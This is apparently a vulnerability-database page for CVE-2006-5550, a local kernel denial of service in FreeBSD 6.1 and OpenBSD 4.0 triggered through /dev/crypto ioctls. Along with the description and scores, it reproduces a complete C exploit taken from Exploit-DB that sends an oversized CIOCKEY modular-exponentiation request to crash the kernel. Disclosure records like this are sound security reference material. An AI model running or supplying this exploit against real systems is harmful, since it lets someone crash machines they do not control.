CVE-2006-5550 : Detail

CVE-2006-5550

0.05%V3
Local
2006-10-26
17h00 +00:00
2024-09-16
20h58 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The kernel in FreeBSD 6.1 and OpenBSD 4.0 allows local users to cause a denial of service via unspecified vectors involving certain ioctl requests to /dev/crypto.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2639

Publication date : 2006-10-23 22h00 +00:00
Author : Evgeny Legerov
EDB Verified : Yes

// Evgeny Legerov (elegerov.blogspot.com) #include unistd.h #include sys/types.h #include stdio.h #include fcntl.h #include crypto/cryptodev.h int main() { int fd2, fd; struct crypt_kop kop; printf("FreeBSD 6.1 /dev/crypto local kernel DoS\n"); fd2 = open("/dev/crypto", O_RDWR, 0); if (fd2 == -1){ perror("open"); exit(-1); } if (ioctl(fd2, CRIOGET, &fd) == -1) { perror("ioctl"); exit(-1); } kop.crk_op = CRK_MOD_EXP; kop.crk_iparams = 3; kop.crk_oparams = 1; kop.crk_param[0].crp_nbits = 0x70000000; ioctl(fd, CIOCKEY, &kop); printf("exploit failed\n"); return 0; } // milw0rm.com [2006-10-24]

Products Mentioned

Configuraton 0

Freebsd>>Freebsd >> Version 6.1

    Freebsd>>Freebsd >> Version 6.1

      Freebsd>>Freebsd >> Version 6.1

        Openbsd>>Openbsd >> Version 4.0

        References

        http://www.securityfocus.com/bid/20713
        Tags : vdb-entry, x_refsource_BID
        http://secunia.com/advisories/22543
        Tags : third-party-advisory, x_refsource_SECUNIA